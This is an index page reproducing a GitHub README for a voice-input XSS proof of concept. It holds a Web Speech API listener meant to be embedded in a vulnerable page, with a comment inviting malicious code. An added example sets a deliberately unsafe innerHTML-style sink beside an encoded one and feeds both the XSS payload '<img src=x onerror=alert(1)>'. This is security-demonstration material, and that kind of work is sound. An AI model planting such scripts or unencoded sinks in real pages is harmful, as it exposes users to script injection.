Ecosyste.ms: Awesome
An open API service indexing awesome lists of open source software.
https://github.com/blue0x1/vocal-xss
The Vocal XSS demonstrates proof-of-concept scripts for exploiting voice-based Cross-Site Scripting (XSS) in web applications.
- Host: GitHub
- URL: https://github.com/blue0x1/vocal-xss
- Owner: blue0x1
- Created: 2024-05-13T03:22:13.000Z (8 months ago)
- Default Branch: main
- Last Pushed: 2024-05-13T03:39:57.000Z (8 months ago)
- Last Synced: 2024-05-13T04:36:39.559Z (8 months ago)
- Homepage:
- Size: 116 KB
- Stars: 0
- Watchers: 1
- Forks: 0
- Open Issues: 0
Metadata Files:
- Readme: README.md
README
# Voice Input XSS
This proof of concept demonstrates how voice input can become a Cross-Site Scripting (XSS) vector. Using the Web Speech API, a script placed on a vulnerable web page listens for speech and hands the recognized transcript to JavaScript; whatever that handler does with the transcript runs in the page's origin as soon as the user speaks.
## Description
The provided script uses the Web Speech API to listen for voice input. When the recognizer returns a result, the script captures the transcript and shows it in an alert dialog. An attacker who can place the script on the page could instead execute arbitrary JavaScript with the transcript. Note that the listener itself only runs where script injection is already possible; the voice channel matters when the recognized transcript flows into a DOM sink such as innerHTML or an eval-like call without encoding, because the transcript is then attacker-influenced input in the page's origin.
## Proof of concept
![image](image.gif)
## Steps to Reproduce
1. Create or identify a web page vulnerable to XSS.
2. Embed the following JavaScript code into the vulnerable web page:

```javascript
// Chrome exposes the API under the webkit- prefix; use the standard name when present.
const SpeechRecognitionCtor = window.SpeechRecognition || window.webkitSpeechRecognition;
const recognition = new SpeechRecognitionCtor();
recognition.lang = 'en-US';
recognition.interimResults = false; // deliver only final results
recognition.maxAlternatives = 1;

recognition.onresult = function (event) {
  const transcript = event.results[0][0].transcript;
  // Inject malicious code here instead of displaying the transcript
  alert('Transcript: ' + transcript);
  recognition.stop();
};

recognition.onerror = function (event) {
  // 'not-allowed' means the microphone permission was denied
  console.error('Speech recognition error:', event.error);
};

window.addEventListener('DOMContentLoaded', function () {
  recognition.start();
});
```
3. Grant the microphone permission when the browser prompts for it; without it, recognition never starts and `onerror` fires with `not-allowed`.
4. Visit the web page using a browser that supports the Web Speech API (e.g., Google Chrome).
5. Speak into the microphone. The script captures your speech and runs the result handler on the transcript, so whatever code was placed there executes.
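The following is an added example, not code from the vocal-xss repository: it shows the part the steps above leave implicit, namely the transcript reaching a DOM sink. It puts an unsafe handler that concatenates the transcript into markup beside a hardened one that encodes it first, and wires both to a recognition object that is passed in, so the same function works with the real `SpeechRecognition` in a browser or, as here, with a constructed stub that "hears" a fixed transcript or reports the `not-allowed` error. The stub, the payload transcript and the `render*` helpers are assumptions made for the example; real engines rarely emit markup characters, but the sink must not rely on that.

```javascript
// Added example, not the project's code: transcript handling with an
// unsafe sink beside its hardened form, driven by an injected recognizer.

// Minimal HTML encoder for text placed inside an element body.
function escapeHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}

// Unsafe: transcript concatenated straight into markup (an innerHTML sink).
function renderUnsafe(transcript) {
  return '<p class="transcript">' + transcript + '</p>';
}

// Hardened: same output shape, but the transcript is encoded first.
// In a real page, el.textContent = transcript is simpler still.
function renderSafe(transcript) {
  return '<p class="transcript">' + escapeHtml(transcript) + '</p>';
}

// Configures a SpeechRecognition-like object, starts it, and records the
// markup produced from the first result (or the error code, if any).
function wireRecognition(recognition, render) {
  const out = { html: null, error: null };
  recognition.lang = 'en-US';
  recognition.interimResults = false;
  recognition.maxAlternatives = 1;
  recognition.onresult = (event) => {
    const transcript = event.results[0][0].transcript;
    out.html = render(transcript);
    recognition.stop();
  };
  recognition.onerror = (event) => { out.error = event.error; };
  recognition.start();
  return out;
}

// Constructed stub standing in for window.SpeechRecognition (assumption for
// the example). On start() it either delivers the given transcript as a
// result or, when an error code is supplied, reports it via onerror.
function makeStubRecognition(transcript, errorCode) {
  return {
    stopped: false,
    start() {
      if (errorCode) {
        this.onerror({ error: errorCode });
        return;
      }
      this.onresult({ results: [[{ transcript }]] });
    },
    stop() { this.stopped = true; },
  };
}

// Constructed payload transcript; stands in for whatever text the engine returns.
const PAYLOAD = '<img src=x onerror=alert(1)>';

function demo() {
  const unsafe = wireRecognition(makeStubRecognition(PAYLOAD), renderUnsafe);
  const safe = wireRecognition(makeStubRecognition(PAYLOAD), renderSafe);
  const denied = wireRecognition(makeStubRecognition(PAYLOAD, 'not-allowed'), renderSafe);
  return { unsafe: unsafe.html, safe: safe.html, deniedError: denied.error, deniedHtml: denied.html };
}

// In a browser the same wiring is:
//   const Ctor = window.SpeechRecognition || window.webkitSpeechRecognition;
//   wireRecognition(new Ctor(), renderSafe);
```

`demo()` returns the unsafe markup with the payload intact, the hardened markup with `<` and `>` encoded, and, for the denied stub, no markup at all plus the `not-allowed` error code, which is the failure mode step 3 describes.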